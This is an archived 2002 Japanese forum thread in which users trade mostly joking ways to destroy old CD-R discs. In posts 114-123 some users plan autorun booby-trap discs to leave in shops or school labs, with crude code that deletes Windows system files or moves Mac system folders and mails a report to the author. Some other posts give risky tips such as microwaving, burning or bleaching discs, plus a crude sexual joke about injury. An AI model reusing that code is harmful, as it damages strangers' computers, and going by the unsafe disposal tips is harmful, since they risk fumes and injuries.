5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

いらなくなったCD-Rの破棄方法

1 :名無しさん◎書き込み中:02/02/27 22:29 ID:s+xvSVss
みなさんはどのように破棄してますか?
割ると手が痛いし、破片が飛ぶし…

2 :2:02/02/27 22:30 ID:LIvyaNe3


3 :名無しさん◎書き込み中:02/02/27 22:31 ID:tQwkoxIq
(ヽ´∀`/)<2ですか?

4 : :02/02/27 22:34 ID:4vXSFAXf
やっぱ、スピンドリルでしょ(w

5 :名無しさん◎書き込み中:02/02/27 22:40 ID:qe4inYKY
前にもこんなスレ見たな。

6 :ヒーボー:02/02/27 22:47 ID:ZpLpO4+y
表側にガムテープ貼ってはがすと、メッキがはがれてもう読めないそうだ。

7 :名無しさん◎書き込み中:02/02/27 22:57 ID:AdADmSb+
そういや昔あきばお〜で売ってた蝿叩き型スタンガンが
レーベル剥がしに使えるって話があったな

8 :純情@博多っ子 :02/02/27 22:59 ID:ioclYb0U
ジュッて焦がすんでしょ(w

9 :なつみぃ・・・シクシク:02/02/27 23:03 ID:0el9MwF0
gasコンロで焼く
実際にやりました
ふにゃふにゃになった

10 :名無死惨:02/02/27 23:09 ID:0HzW88Ct
>>6
レーベル面が丈夫なヤツだと歯が立たない。

11 :名無しさん◎書き込み中:02/02/27 23:09 ID:ldcUAdtq
http://www.wed-bell.com/clickdata/clickview.asp?host_id=000290

12 :名無しさん◎書き込み中:02/02/27 23:13 ID:82/Gs2ga
ライターを使って軽くあぶる

13 :名無しさん◎書き込み中:02/02/27 23:41 ID:/bLYndxR
>>9
>>12
すっちゃだめなガス出たりしない?

14 :ぢゅろん ◆Durondew :02/02/28 00:07 ID:TiKM7//H
電子レンジ

15 :名無しさん◎書き込み中:02/02/28 00:38 ID:pnH3ndtr
http://www2.aplix.co.jp/cdr/products/around/eraser/

こんなのあるけど高いよね

16 :名無しさん◎書き込み中:02/02/28 01:17 ID:rosBL7Vl
>15
いくらなんでも高すぎる

椎茸干すようにベランダに一週間ぐらいならべといたら?

17 :名無しさん:02/02/28 01:28 ID:SZOOt+XR
普通に不念仏の日に捨てろよ(w

18 :名無しさん◎書き込み中:02/02/28 01:35 ID:+wSpuMf1
電子レンジに一票

19 :名無しさん◎書き込み中:02/02/28 01:35 ID:PZcI6BKt
―――――――――――――‐┬┘
                        |
       ____.____    |
     |        |        |   |
     |        | ∧_∧ |   |
     |        |( ´∀`)つ ミ |
     |        |/ ⊃  ノ |   |
        ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄    |      ◎

20 :名無しさん◎書き込み中:02/02/28 01:44 ID:b09VOnXK
投げ捨てろってか

21 :名無しさん◎書き込み中:02/02/28 02:13 ID:xrMynNtt
−ドライバの角でスジ入れ
シャープペンシルで上に同じ


22 :名無しさん◎書き込み中:02/02/28 02:15 ID:yk1mocP4
>>19
カワイイ!もらた

23 :名無しさん◎書き込み中:02/02/28 04:12 ID:436wwHDK
アクアリウム用等の殺菌灯を当てるのは駄目かな?

24 :名無しさん◎書き込み中:02/02/28 04:28 ID:NRtqzB/3
>>19

25 :名無しさん◎書き込み中:02/02/28 05:01 ID:Cdqns/RX
カッターナイフでところどころに切込みを入れれば大丈夫では?

26 :ぢゅろん ◆Durondew :02/02/28 06:58 ID:TiKM7//H
>16
メディアによるが1週間程度の天日干しではデータは消えないだろ
こんなとき国産メモレはつらいな
2chネラーの天日干し実験で3ヶ月持った記録がある

27 :名無しさん◎書き込み中:02/02/28 09:10 ID:TLIxTpfl
こんな怪しいものが売っているぞ!

www.rakuten.co.jp/recording/448009/453301/

28 : :02/02/28 09:20 ID:iB/WQbKW
まるめてポイ

29 :名無しさん◎書き込み中:02/02/28 09:21 ID:n07pgyDe
別に怪しかないよ。
この部分にキズ付ければ(普通の方法では)読み出し出来ないし、
刃の耐久性はかなりあるとパッケージには書いてあた。

30 :名無しさん◎書き込み中:02/02/28 09:31 ID:sAYyICcc
エアガンの的

31 :◎ミ:02/02/28 09:39 ID:yE77vxnb
>>22
ttp://www.geocities.co.jp/Milano-Cat/1568/throw.swf?b64=DZGLgqmC5w%3D%3D%0Dk4qCsI7MgsSC6w%3D%3D%0DDQ0NICAgICAgICAgICCBnQ%3D%3D

32 :名無しさん◎書き込み中:02/02/28 10:14 ID:qumrQxI4
ガスガンのデザート44で撃ったら、粉々になった

33 :名無しさん◎書き込み中:02/02/28 10:21 ID:Gm354TkQ
電子レンジで5秒チン!
おすすめ

34 :名無しさん◎書き込み中:02/02/28 10:43 ID:rosBL7Vl
>30,32
大量にあるCDR一枚破壊するごときにいちいちガ銃で撃っていたら効率悪いことこの上ない

35 :32:02/02/28 10:48 ID:qumrQxI4
>>34
だったらソーラーシステムでも作ってくれ

36 :名無しさん◎書き込み中:02/02/28 14:05 ID:n07pgyDe
いや、もっと大量にまとめて打ち上げて、ソーラレイ作るというのもテかも

37 :名無しさん◎書き込み中:02/02/28 14:57 ID:BymQomsQ
>>1はCD-Rに見られたらヤバいものでも焼いていたのだろうか?

38 :名無しさん◎書き込み中:02/02/28 16:14 ID:9tYo5eIH
花火で溶かすとおもしろいよ。

39 :名無しさん◎書き込み中:02/02/28 18:58 ID:PdG+jlrM
>>10
CDのレーベル面にカッターで傷をつけるて
ガムテープを張って剥がすとレーベル面が剥がれる。

40 :名無しさん◎書き込み中:02/02/28 19:27 ID:qumrQxI4
[君が望む永遠 茜たん追加シナリオβ版]と書いて路上に放置

41 :名無しさん◎書き込み中:02/02/28 23:21 ID:rosBL7Vl
割れずディスクで指紋がついていない自信があれば夜こっそり秋葉に並べておくと面白いかも知れない

42 :22:02/03/01 00:39 ID:2tsACHV+
>>31
カワイイ!これもモラタ

43 :名無しさん◎書き込み中:02/03/01 01:35 ID:7NKcL5B4
>>34
物干し竿などにセロハンテープなどで大量に吊るして、
あとは電動ガンをフルオート(連射)で掃射。
これなら大量にあっても、少しは楽になると思う。
何より撃ってて気持ちがいい。ストレス解消とかにもなる。

ただ、レーベルが飛び散って後始末が大変などのデメリットのほうが大きい。
電動ガンなら問答無用で粉々。ガスガンでもいける。
18才用エアハンドガンはちょいと難しい。それ以外は知らない。
ちなみに読み取り面を狙ったほうが粉々になる確率は高い。

あまり関係ないのでsage

44 :名無しさん◎書き込み中:02/03/01 02:07 ID:4QGULscI
カラス避けに使おう。
紐に吊してさ。

45 :名無しさん◎書き込み中:02/03/01 03:19 ID:kxsEuNsz
川に流せ

46 :名無しさん◎書き込み中:02/03/01 05:54 ID:OxtNIIXG
紙やすり。だめ?

47 :名無しさん◎書き込み中:02/03/01 07:05 ID:y7FpyrqB
ベランダに一ヶ月ほど放置しとけ
んだら読めなくなるよ

48 :ぢゅろん ◆Durondew :02/03/01 07:28 ID:LQxTs6Ct
>43
銃の腕がイイ奴は大変だな
体が反射的にメディアの中心の穴を狙ってしまうからな(w

>44
スズメやハト除けに使うのは分かるがナゼカラスに?
カラスは光り物が好きなのでは(w

>47
>>16>>26ですでに出てる
50レスぐらい読めや(゚Д゚)ゴルァ

49 : :02/03/01 09:03 ID:pTLvQoKu
自分は外で破片が飛ばないように、スーパーのレジ袋に入れその中で
下のコンクリート等に押し付けながら、ペンチでねじり割る。
完璧!

50 :名無しさん◎書き込み中:02/03/01 10:24 ID:wMuolTil
なんかさ、前にCD-Rにさしてグルッと回すと
読めなくなるとかいう道具が出なかった?
ずっと探してるんだけどないんだよな。
夢で見たのかな。


51 :名無しさん◎書き込み中:02/03/01 10:35 ID:OxtNIIXG
>>50
確かあるぞ。TOC部分を引っかいて読めなくするんだったかな?
福岡天神ZEEXのOAシステムプラザにおいてあるのを見たことがある。

52 :1111:02/03/01 11:25 ID:BkCiuCLn
>>51

それはDAOのみに有効
TAOのメディアは読み取れることがあるよ

というか、ドラゴンコンピュータで研磨サービスがあるから復活は
十分に可能

53 :名無しさん◎書き込み中:02/03/01 11:33 ID:lzF4PdL6
CD-Rへの焼き方誰か教えてください!!

54 :1000:02/03/01 14:48 ID:BkCiuCLn
そのまま捨てろ!
結局>>1もゴミ箱に突っ込んでるんだろ?
論じるだけ時間の無駄だよ

55 :名無しさん◎書き込み中:02/03/01 15:27 ID:1RlBeupg
粉々に砕いて隣の家のポチの餌

56 : :02/03/01 15:48 ID:YN5TjsFu
ポチ吐血。

57 :名無しさん◎書き込み中:02/03/01 16:31 ID:zozHbT2o
産業廃棄物になるんだからせめてeco的に虫眼鏡だよ。

58 :名無しさん◎書き込み中:02/03/01 22:05 ID:GOMhFKva
電子レンジで破棄してるが、一度に何枚もやると
袋にいれてても、金属的なにおいが漏れてくる。
あれは有害じゃないのか?


59 :こうしなさい:02/03/02 01:38 ID:zjqijOCJ
http://www.geocities.co.jp/Milano-Cat/1568/throw.swf?b64=DZGLgqmC5w%3D%3D%0Dk4qCsI7MgsSC6w%3D%3D%0DDQ0NICAgICAgICAgICCBnQ%3D%3D

60 :名無しさん◎書き込み中:02/03/02 03:17 ID:R51myqjE
X-BOXで再生、傷ついてアボーン!

61 :名無しさん◎書き込み中:02/03/02 11:49 ID:MocWiJig
凸凹の白い壁(公共施設とかでよく見かける奴)に
記録面を押しあてて全力疾走!
傷だらけの上に塗料がついて変な道具買うよりずっとイイ
後はその変のゴミ箱にポイ

62 :名無しさん◎書き込み中:02/03/02 12:18 ID:sa352O90
>>60 (・∀・)イイ!

63 :名無しさん◎書き込み中:02/03/02 17:12 ID:W8r+H2i6
>>61
デメリット1.何枚もある場合疲れる。
デメリット2.誰かに見つかった時のリスクが大きい。

64 :名無しさん◎書き込み中:02/03/04 01:09 ID:mGcevt8T
>>19
ワラタ

65 :名無しさん◎書き込み中:02/03/04 01:11 ID:v/dGKcAF
1.トイレに行きます。
2.自分のベストの位置にセットします。
3.狙いをつけて頑張ります。
4.完了

66 :名無しさん◎書き込み中:02/03/04 01:21 ID:l2eWta5s
ていうかそんなに読みとられるとまずいデータなんて捨てるか?
みなさん企業の経理担当の人?

67 :名無しさん◎書き込み中:02/03/04 01:22 ID:wqvXstn8
ガムテープで剥がしてしまうよりは...

レーベル面の内周と外周にぐるっと、カッターで切りこみを入れて、
手で、そぉ〜っと反射層はがす。これ快感。

68 :名無しさん◎書き込み中:02/03/04 03:26 ID:19TXakzU
>>59
それやったら数日後にマンションの
管理人が落し物の紙貼ってたよ・・・。
やはりCD-Rを知らない人には貴重品に見えるのだろうか・・・。

69 :名無しさん◎書き込み中:02/03/04 07:47 ID:Nn692pKX
>>46で既出だが、60番ぐらいのやすりでこすって記録層をはがす。


70 :1000:02/03/04 09:42 ID:zNLlYmt2
わざわざ読めなくする必要あんの?

71 :名無しさん◎書き込み中:02/03/04 09:53 ID:7o76Yxn3
http://www.maxell.co.jp/products/consumer/cd_poit/

http://www.maxell.co.jp/products/consumer/cd_poit/

http://www.maxell.co.jp/products/consumer/cd_poit/

http://www.maxell.co.jp/products/consumer/cd_poit/

http://www.maxell.co.jp/products/consumer/cd_poit/

5回書く。

72 :名無しさん◎書き込み中:02/03/04 10:10 ID:dAad0HGd
>>67
オレもそうしてる!!

73 :名無しさん◎書き込み中:02/03/04 10:21 ID:y3RMMBlP
手で割る。
もちろん破片が飛ぶのでゴミ袋のなかでね。

74 :名無しさん◎書き込み中:02/03/04 10:50 ID:NtYUV/fT
鉈で叩き割る

10枚ぐらいを一撃で真っ二つに出来る
気分も良い
人に見られるとヤバイ(藁

75 :名無しさん◎書き込み中:02/03/04 14:31 ID:AHVbrsVL
ビニールに入れて燃えないゴミの日に出す。

--------------- 完了 ----------------

76 :名無しさん◎書き込み中:02/03/04 22:26 ID:mGcevt8T
電子レンジにしとけYO

77 :名無しさん◎書き込み中:02/03/05 00:19 ID:J75Hok7w
 鉄筆で文字を書く。謄写印刷(ガリ版印刷)の原稿のように。
そしてインクを載せて表面を拭けば、凹版印刷の原版になる。
あとはルーレットがけして、表面を小さな穴を空ける。

78 :名無しさん◎書き込み中:02/03/05 01:08 ID:2vwxCBhd
ゴミ箱の上ではさみを使って
メッキをはがす。
コレ最強。

79 :名無しさん◎書き込み中:02/03/05 01:19 ID:vpvHO1MC
ストーンコールドスタナー

80 :名無しさん◎書き込み中:02/03/05 01:23 ID:9q3/ijCF
みんなストレス溜まってんだね

81 :名無しさん◎書き込み中:02/03/05 01:52 ID:F1aNo+cR
>>79
ソレハチトムズカシイ

82 :名無しさん◎書き込み中:02/03/05 01:57 ID:Lc6PGsuN
フリスビーにして遊ぶか
農業やってるオッちゃんに
カラス避けにして1枚30円で売りつける。
で30円だして買ってくる

83 :名無しさん◎書き込み中:02/03/05 11:18 ID:7e1PwHr1
袋に入れたまま車で踏めばいいじゃん

84 :名無しさん◎書き込み中:02/03/05 11:21 ID:8ExXsOuj
>>82
フリスビーにするとサクッと刺さらない?

85 :名無しさん◎書き込み中:02/03/05 12:56 ID:fchJWNOq
CD-Rの色素って人間にとっては有毒だよね?

86 :名無しさん◎書き込み中:02/03/05 12:59 ID:zhrwW65u
こんなスレあったんだ・・・
>1
ちょうど今ディスクをおろうとしたら「ぱんっ」って言って破裂した。
びっくりした。危ないな。

87 :名無しさん◎書き込み中:02/03/05 13:00 ID:010WC7YF
>>85
プリンコ割ったときに手に付いたのを嘗めた事あるけど・・


88 :名無しさん◎書き込み中:02/03/05 13:07 ID:fchJWNOq
>>87
ネタ?
って言うか嘗めておいしいもんなの?アレ

89 :名無しさん◎書き込み中:02/03/05 13:13 ID:010WC7YF
>>88
いや、正確には
「データが消えてむかついて素手で割ったときに、破片が薬指に刺さったから嘗めた」
その時に色素らしい薄黄色〜透明っぽい液が手に付いてた
量としてはすごく少ないと思う。
味は、無味無臭だったと思う

90 :名無しさん◎書き込み中:02/03/05 14:25 ID:Lc6PGsuN
84
人ぐらいには刺さります
職場ではR回収トレイまで
投げるのを俺がはやらせたら
新入りの私欲処理係に当たって、
上司に口頭注意された

91 :_:02/03/05 14:58 ID:UR1SDVHR
昔は一枚一枚素手で割ってました。
ですが一度力入れすぎて思いっきり手を切ってしまい、以後は袋に詰めて金槌で割ってます。

92 :名無しさん◎書き込み中:02/03/05 14:58 ID:l/2yVs/k
>>87
氏にます

93 :名無しさん◎書き込み中:02/03/05 14:59 ID:l/2yVs/k
割ったりするのは危険。
破片が飛んで目に刺さっても知らないよ

94 : :02/03/05 15:10 ID:el0zcrdK
カッターでレーベル面切ったとき、すんごい細かいキラキラが舞っちゃうんだけど、
やっぱ有害だよね。絶対吸っちゃってるんだけどどうしよ。。。

95 :名無しさん◎書き込み中:02/03/05 15:22 ID:/rJWhvCM
割る前にここ読めば良かった・・・
弾け飛ぶとは思ってもいなかったから。マジで危ない。
眼鏡かけてて良かった。
ていうか、あんな割れ方するような作りで良いのか?

96 :名無しさん◎書き込み中:02/03/05 15:46 ID:I3B8/QqO
>>90
私欲処理係って、何?
楽しそうな役割だなあ。性◎◎◎係もあったらいいなあ。

97 :名無しさん◎書き込み中:02/03/05 16:08 ID:7e1PwHr1
書類処理係の打ち間違え?

98 :名無しさん◎書き込み中:02/03/05 16:10 ID:4w0FQ2Lz
つかいっぱしりの意味だろ。

99 :nanasi:02/03/05 17:16 ID:ws3tyVV3
電子レンジ で チン

100 :100!:02/03/05 17:54 ID:fchJWNOq
 

101 :名無しさん◎書き込み中:02/03/05 20:18 ID:K3N5JZZ4
>>99
チン後のレンジで調理すると、skZJEFHzl。skg

102 :名無しさん◎書き込み中:02/03/05 20:19 ID:gNu+8puP
前に音楽CDの上に飲み物をこぼしてるのに二、三日気付かず、
銀膜部分に横から侵入したらしく端から腐食してて使い物にならなくなってた。


103 :新語誕生か:02/03/05 20:51 ID:nGmbbNPF
>>101
skZJEFHzl。skgって何?

104 :名無しさん◎書き込み中:02/03/06 17:15 ID:tj80/YkK
コンビニのゴミ箱にポイ。

ていうかRに限らず。

105 :名無しさん◎書き込み中:02/03/06 18:19 ID:wV8MZdFr
つーか、鍋で煮よう。

106 :名無しさん◎書き込み中:02/03/06 18:29 ID:9aKs8uf+
http://www.linkstaff.com/linkstaff/bouken/cgi/click.cgi?id=10245

107 :名無しさん◎書き込み中 :02/03/06 23:18 ID:5gYqJa35
淀川でフリスビーのように投げてみた。
結構遠くまで飛んだ。

108 :        :02/03/06 23:22 ID:yrLOu9E7
電子レンジでチン!

109 :名無しさん◎書き込み中:02/03/06 23:28 ID:tj80/YkK
「エロ画像CD」とタイトルを記入して
道端に置いてどんな奴が拾うか観察しよう。

出来れば写真も撮って記録をとっておこう。

110 :名無しさん◎書き込み中:02/03/06 23:33 ID:hxzSSdqf
>>109
学校や職場でやるとなお良いかも。
ただし、CD-Rトラップのセッティング場面を見つかると
エロCDの人と言う烙印を押されるかもしれないという諸刃の剣。


111 :ん?:02/03/06 23:37 ID:XxcDFmNc
最初から CD-RW 買うよろし。
要らないデータは消去し、新しいデータに置き換えることが可能。
「CDDA作らない」という人にとっては、CD-Rは必要ではなかったり
する。


112 :名無し~3.EXE:02/03/06 23:44 ID:ncopOLtW
猫よけにリサイクル

113 :名無しさん◎書き込み中:02/03/07 00:34 ID:nwhUtVV8
>109
やって写真うpしてくれ

114 :名無しさん◎書き込み中:02/03/07 18:01 ID:YAAti8JG
どーせならautorun.inf使ってブービートラップ仕掛けてほすぃ。

115 :名無しさん◎書き込み中:02/03/07 18:14 ID:XfG1HK2R
CD-Rでいたずらスレに変更しました

116 :109:02/03/07 21:08 ID:fUWC1r87
とりあえず「いつかやってみようかと思ういけない遊び」リストに加えておく。
秋頃に「捕まえたゴキを電子レンジでチンしてみる」というのも思い付いたが
寒くなって全く出没しなくなったので保留してる。
ちなみにそれらは実際やったらどこかにup予定だ。

>>114
プログラムを仕掛けておくというのも考えはしたがプログラム能力が無いのでボツ。

117 :名無しさん◎書き込み中:02/03/07 22:34 ID:nwhUtVV8
>116
(MacになるがWin用にコンパイル出来る)REALBasicあたり出来れば簡単だよ
autorun.infなんて適当にCDから拾ってこい、で書き換えろ

コード
MsgBox "君のマシンは壊れました"
(C:\Windows\Win.com).delete
(C:\WINNT\Win.com).delete

これでたぶん動かなくなると思う

118 :名無しさん◎書き込み中:02/03/08 22:02 ID:drVeIgO5
>84
初代FMタウンズはCD回転中にドライブのふたを開けると、CDが飛びます。

119 :名無しさん◎書き込み中:02/03/08 22:16 ID:DfYCXN12
>>117
(((( ;゚Д゚)))ガクガクブルブル

120 :名無しさん◎書き込み中:02/03/08 22:56 ID:ju861ShF
>>117
漏れが高校卒業する前に教えてくれれば
それやってパソ室に放置してきたのに・・・。
残念。

でも家電量販店のPC売り場に落としてみます。
ありがd。

121 :116:02/03/08 23:20 ID:vwen3IKd
>>117
win環境の無いマカーなのでプログラム戦略は残念ながら却下。
第一其れでは実際被害が出たか確認出来ず、
面白くも何ともなく只の嫌がらせになってしまい美学に反するのでボツ。
メールソフトを乗っ取れる位のスキルが有れば
自メアドをネットから適当に拾って来たメアド群に紛らせて、それら全て宛てに報告を送るとかしたいのだが。(足がつきにくい様にする為)

122 :名無しさん◎書き込み中:02/03/08 23:23 ID:/IA6//q5
―――――――――――――‐┬┘
                        |
       ____.____    |
     |        |        |    |
     |        | ∧_∧ |    |       ≡◎
     |        |( ´∀`)つ ≡ ◎    ≡◎
     |        |/ ⊃  ノ |   |         ≡◎
        ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄     |       


123 :117:02/03/08 23:47 ID:tHWLAfkm
>121
ようするに自分の所に報告されれば面白いんだな?
ならRbですげぇ小さいウインドウでも作ってそれをAutoStartで焼け

Open

Dim fi As FolderItem
fi = SystemFolder
fi.Child("Finder").MoveTo ExtensionFolder//ゴミ箱はさすがに見つかるから
fi.Child("System").MoveTo ControlPanel

Socket.Connect

で適当にメールサーバ設置して(ここで足がつくかも)Socketを使って結果送信(長引けばばれるけど)
Socketの例
Dim end As String
end = chr(13)+chr(10)
socket.write "HELO: (適当)"
socket.write "MAIL FROM: (適当)"
socket.write "RCPT TO: (自分のメアド)"
socket.write "DATA (適当)"
socket.write end + "." + end
socket.close
でたぶん報告出来ると思うがどうなっても俺は知らんぞ

124 :名無しさん◎書き込み中:02/03/09 00:18 ID:IJiRqsgn
Rは燃やすにかぎる(w

125 :名無しさん◎書き込み中:02/03/09 02:46 ID:RDMscpix
>124
ダイオキシソがデルだろーが

126 :121:02/03/09 23:21 ID:AIPC51Y9
>>123
援護情報有り難いがそこ迄書かれてもプログラムは基礎も出来てないので無理だ。
期待に答えられずスマン。

127 :名無しさん◎書き込み中:02/03/10 11:06 ID:UEKYxdw5
CD-Rって中に銀とか使ってるから、廃棄するのはちょっと心が痛い…。
環境にも悪いし…

リサイクルのために回収してくれるとこってない?

128 :名無しさん◎書き込み中:02/03/10 13:41 ID:iHAZ9O67
>>127がいい事言った!

129 :名無しさん◎書き込み中:02/03/10 22:33 ID:EjMsWFi6
回収が義務づけられると価格が上がるだろうな。
信用できないから結局壊してから出さないと逝けないし。
手間かかるな。

130 :名無しさん◎書き込み中:02/03/10 23:02 ID:tTeFr9TC
>>127
誘電回収してますよ。今はどうか知りませんが。

131 :名無しさん◎書き込み中:02/03/10 23:06 ID:bmsGxMnO
>127
回収しても再利用や再生は方法とかコストとかで
非常〜〜〜〜に難しいだろ


132 :名無しさん◎書き込み中:02/03/10 23:15 ID:WUemTikE
鋏で切ってる漏れは論外?
割らずに安全に真っ二つに出来るので結構してるのだが・・。
レーベルも大して飛び散らないし。

133 :名無しさん◎書き込み中:02/03/10 23:34 ID:bmsGxMnO
やはり電子レンジが早くて手軽で一番
臭くなるのがイヤなら専用のを買え(w

134 :名無しさん◎書き込み中:02/03/10 23:46 ID:EjMsWFi6
>133
体に悪くないの?
不能になるとか、種減るとか

135 :名無しさん◎書き込み中:02/03/10 23:56 ID:U5DTRgF0
電子レンジ破棄マンセー

136 :  :02/03/11 00:14 ID:A2RjhuDa
電子レンジで200枚ぐらい破棄した
くさ〜、スパーク見てたらちょっと目がくらくらしたが

137 :名無しさん◎書き込み中:02/03/11 00:20 ID:6qAQM/xT
>136
加熱中の電子レンジ庫内は見ないほうがいい
目にダメージを受ける可能性が大きいyo

138 :名無しさん◎書き込み中:02/03/12 03:36 ID:+snyI3Hl
物置とか人気のない場所でジア塩素酸にでもつけといたらどうですかね。臭いけど

139 :名無しさん◎書き込み中:02/03/12 04:29 ID:DbWIi8MP
>>132
ふつーのはさみでふつーにきれるのか?

140 :名無しさん◎書き込み中:02/03/12 20:47 ID:9/0NXQ/Z
>>138
アゾになるのか?(藁

141 :名無しさん◎書き込み中:02/03/12 21:16 ID:7cr0GZLV
DVD-Rの破棄方法についても討論よろしいかね?

私は2枚にはがして捨てている

142 :名無しさん◎書き込み中:02/03/13 00:49 ID:eNUDuSKv
>>141
DVDはトイレに流すのが定説

143 :141:02/03/13 02:37 ID:L2UVmr67
>>142
くみ取りポットンなんだよ!

そんな私は破棄方法よりも、入手方法に頭を悩ませる田舎に住んでいたりする
CD-Rならちかくのホームセンターにあったりするんですけど、DVD-Rを買うには車で1時間!!!
スレ違いだね、でも上る

144 :名無しさん:02/03/13 21:48 ID:NaTezEZ5
勃起したチソポを穴に入れてオナ

145 :名無しさん◎書き込み中:02/03/13 22:14 ID:ihPYbImp
http://startlab.co.jp/otoiawase/recicle.htm

146 :名無しさん◎書き込み中:02/03/13 22:31 ID:7F0GhTbb
>>144
イタタッ!!
イデージャネーカゴルァ

147 :wairi:02/03/13 22:33 ID:+7jBtj0J
2階の窓からフリスビー

148 :144:02/03/13 22:35 ID:NaTezEZ5
>>146すごい痛い、でもチソコにあわせて穴広げればきもちいい!


149 :名無しさん◎書き込み中:02/03/13 22:36 ID:VGZLn/Ng
>144
入んないよ・・・

150 :///:02/03/13 22:51 ID:bzBvGCyk
>>149

勃起してない時に無理やり亀頭だけでもねじこめ。
勃起してくると天国に逝けるぞ。


151 :144:02/03/13 23:04 ID:NaTezEZ5
>>150(・∀・)イイ!

152 :名無しさん◎書き込み中:02/03/14 00:01 ID:rVpiRuI8
>>150
ギロチンになってしまわないように…

153 :名無しさん◎書き込み中:02/03/14 00:35 ID:+jo6pepo
ガッチャンに食わせる

154 :名無しさん◎書き込み中:02/03/14 01:11 ID:xnIjbpYi
サム

155 :名無しさん◎書き込み中:02/03/14 17:24 ID:q5FTZw4Z
痛くてどうしようもなくなって、仕方なく割ったら飛び散って大変なことに・・・

156 :名無しさん◎書き込み中 :02/03/14 21:54 ID:bhvvlsvz
ペンチでDISKをはさみ、DISKを無理やり動かそうとするとコーティングが
簡単にはがれる(平行に動かすよりは、少しDISKを傾けて動かすのがコツ)

157 :禁句なのか?:02/03/15 01:12 ID:nXAyCCqL
「コースター」ってのは禁句なのか?
漏れはコースターに使っています。綺麗だよ

158 :名無しさん◎書き込み中:02/03/15 01:14 ID:Wf6Xxqfc
>>157あまりにありふれてるので却下

159 :名無しさん◎書き込み中:02/03/15 09:06 ID:YRktxLwQ
部屋の壁に貼り付けまくっております。

160 :名無しさん◎書き込み中:02/03/15 21:37 ID:KXmaucDB
>>157
コースターは破棄じゃなくて再利用だとおもふ

161 :名無しさん◎書き込み中:02/03/16 01:26 ID:m9F9HptZ
>>157
100枚もコースターはいらん


162 :名無しさん◎書き込み中:02/03/16 01:43 ID:AT9vGwgR
使ってるうちに擦り傷がついて、非常に貧乏臭いことが判明 <コースター

163 :名無しさん◎書き込み中:02/03/16 01:59 ID:AT9vGwgR
っていうか、コースターにしちゃうこと自体が貧乏臭いという罠。

164 :名無しさん◎書き込み中:02/03/16 12:30 ID:uWfBXXo4
>>159
基地外?

165 :名無しさん◎書き込み中:02/03/17 02:22 ID:bd76YvFt
>>164
クレイジーと呼んでやれ(藁

166 :名無しさん◎書き込み中:02/03/17 09:29 ID:QXtlGwkW
グレイシーです

167 :50:02/03/17 10:37 ID:4NRNy+al
>>71
おお!それだ!!
いくらぐらいで売ってんだろ

168 :名無しさん◎書き込み中:02/03/17 18:25 ID:XplDgU4X
糸で吊るし、日本刀で両断する。

吊るした紙切れを両断するだけでも
相当な腕前を要するが、CD-Rメディアは
さらに難易度が高い。

刀の軌道と刃の向きが完全に一致し、
さらに目にも止まらぬ速さで振りぬかなければ
CD-Rははじかれ、下手をすると刃こぼれの原因となる。

169 :168:02/03/17 18:31 ID:XplDgU4X
始めは袈裟切りで斜め上から切りつけるのが
いいだろう。

真横に両断できるようになったら、
誰もが認める「達人」クラスである。

毎日毎日、何千回、何万回と
CD-Rに切りつけ、
修練を重ねに重ねた者だけが辿り着ける境地なのだ。

170 :名無しさん◎書き込み中:02/03/17 19:44 ID:VE6OnGGw
>>164
>>165

俺もずっと前からそうしてたし、
店で貰うプロバイダのCDも壁に画鋲で貼りまくってる。
そんなの全然基地外じゃないよ。
ピカピカーーーッ。

うまくいくとCD-Rの耐光性チェックにも使える。

171 :名無しさん◎書き込み中:02/03/18 10:32 ID:IzJU8Nr8
>>170
2chではギャグのつもりでよく使われる常套句だ。
気にすんな。

172 :タカハシ:02/04/03 07:51 ID:+AuB+D/+
電動ガンでこなごなに打ち砕く。飛び散る姿がとても美しい。

173 :名無しさん◎書き込み中:02/04/03 08:21 ID:mOAoPQMC
彫刻刀はどう?比較的幅広に削れるし。

レーベル面を、TOC部分をメインにサクサクッと。
コツをつかめば最も手軽そうな気がするんだが。

今は捨てるメディア無いから試してない。

174 :避処地 ◆I1FuRETM :02/04/03 10:39 ID:MrqSm54w
ガムテでビーッて剥がして解決じゃないの?

175 :名無しさん◎書き込み中:02/04/03 12:28 ID:XoxBHI4A
駐車場のアスファルトにならべ片足のっけて1回転。その後放棄してます

176 :名無しさん◎書き込み中:02/04/03 23:44 ID:Frl8u+/o
>>174
ガムテープ剥がし一回やると「メディアってこんなに弱かったのか」って驚くよね。
ちょいとカッターで数カ所切って貼り付けて剥がせばもうベロベロ。
記録面よりレーベル面の方が遥かに弱いんだと知ってからは
レーベルの方ばかりに気を使うようになったよ。

177 :名無しさん◎書き込み中:02/04/04 18:07 ID:Ti7MJsZb
一回マグカップでコースターに使うと逝ける
せとものではだめね

178 :名無しさん◎書き込み中:02/04/05 08:55 ID:13kHky40
まとめてスピンドルケースに入れて工事現場でこっそりセメントの中に…

179 :名無しさん◎書き込み中:02/04/05 11:42 ID:sDL6/Evd
通報しました

180 :名無しさん◎書き込み中:02/04/06 21:19 ID:7XJVJUlA
>>179
通報しますた

181 :名無しさん◎書き込み中:02/04/06 21:27 ID:rvqn/XA5
>>178
逆に何年持つかわからないね。光当たらないし。
タイムカプセルっぽくて(・∀・)イイ!

182 :名無しさん◎書き込み中:02/04/06 21:34 ID:NK0oBymC
こういうのはどうですか
ttp://www.maxell.co.jp/products/consumer/cd_poit/index.html

183 :名無しさん◎書き込み中:02/04/06 21:38 ID:JiSa/xMK
>>182
>>71
>>27

184 :名無しさん◎書き込み中:02/04/06 21:41 ID:NK0oBymC
>>183
スマソ


185 :名無しさん◎書き込み中:02/04/06 21:42 ID:gPkd8ic/
フリスビーにしかならない

186 :名無しさん◎書き込み中:02/04/06 22:15 ID:mdkx/PwJ
カピラリア7光線で焼き切る

187 :名無しさん◎書き込み中:02/04/06 22:57 ID:H6NCbEhx
食べる

188 :名無しさん◎書き込み中:02/04/07 00:29 ID:tBRSk/5i
>>167
CD-POITだっけ。
1980円だったような気がする。
もう少し高かったかな…?ヨドバシで買った。

189 :名無しさん◎書き込み中:02/04/07 01:38 ID:iklsrCnB
>>186
ラーメンマンに破壊されてこい

190 :名無しさん◎書き込み中:02/04/07 02:52 ID:NddJ3meZ
アソパソマソにアソパソチでブッコワシテもらう

191 :名無しさん◎書き込み中:02/04/07 02:54 ID:YhCCVABt
不燃ゴミに捨てると言えば平凡だが・・。
前使ってたボロドライブではメディアが3枚に一枚、
ブランドによってはほぼ全数がゴミになったので鬱だった。
